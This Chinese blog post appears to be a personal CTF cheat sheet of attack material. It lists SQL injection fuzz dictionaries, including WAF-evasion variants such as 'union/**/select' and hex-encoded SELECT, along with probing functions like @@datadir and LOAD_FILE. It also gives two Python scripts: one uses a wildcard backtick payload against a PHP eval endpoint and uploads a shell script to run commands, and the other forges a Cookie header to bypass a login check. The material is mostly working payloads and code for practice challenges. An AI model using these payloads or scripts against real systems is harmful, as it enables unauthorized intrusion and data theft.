221 字
1 分钟

脚本积累

2026-01-08
浏览量 加载中...

SQL注入:#

fuzz字典:#

与bp共同使用。

转义类字典:#

'
"
`
\
;
,
(
)
[
]
{
}
+
-
*
/
%
=
<
>
!
^
|
&
#
--
--
/*
*/
%00
%0a

单词字典:#

AND
OR
NOT
XOR
UNION
SELECT
INSERT
UPDATE
DELETE
DROP
CREATE
ALTER
WHERE
FROM
LIMIT
ORDER
GROUP
BY
HAVING
SLEEP
BENCHMARK
EXTRACTVALUE
UPDATEXML
LOAD_FILE
INTO
OUTFILE

变形测试字典:#

sEleCt
sel%00ect
union/**/select
/*!SELECT*/
+SELECT+
%53%45%4c%45%43%54
(select)

检测深层功能限制:#

user()
database()
version()
@@version
@@datadir
char()
ascii()
substr()
substring()
count()
concat()
group_concat()

WEB绕过:#

eval执行命令类的一:#

import requests
url = "url" # 替换为题目URL
params = {
'cmd': '?><?=`. /???/p?p??????`;'
}
# POST 上传的文件内容
files = {
'file': ('shell.sh', '#!/bin/sh\ncat /flag.txt')
}
#!/bin/sh:调取shell,\n:换行,cat /flag.txt:实际执行命令
response = requests.post(url, params=params, files=files)
print(response.text)

WEB的POST:#

import requests
url = "你的url"
headers = {
"Cookie": 'user="adm;n"'
} //特定头部
session = requests.Session()
response = session.get(url, headers=headers)
print(f"状态码: {response.status_code}")
print(f"响应内容: {response.text}")
if "login success" in response.text:
print("登录成功!当前 Session Cookie 为:")
print(session.cookies.get_dict())

  • 版权声明:本文由 余林阳 创作,转载请注明出处。

喜欢这篇文章吗?

点击右侧按钮为文章点赞,让更多人看到!

脚本积累
https://sliver-yu.cc/posts/脚本积累/
作者
余林阳
发布于
2026-01-08
许可协议
CC BY-NC-SA 4.0
文章最后更新于 2026-01-08

评论区

目录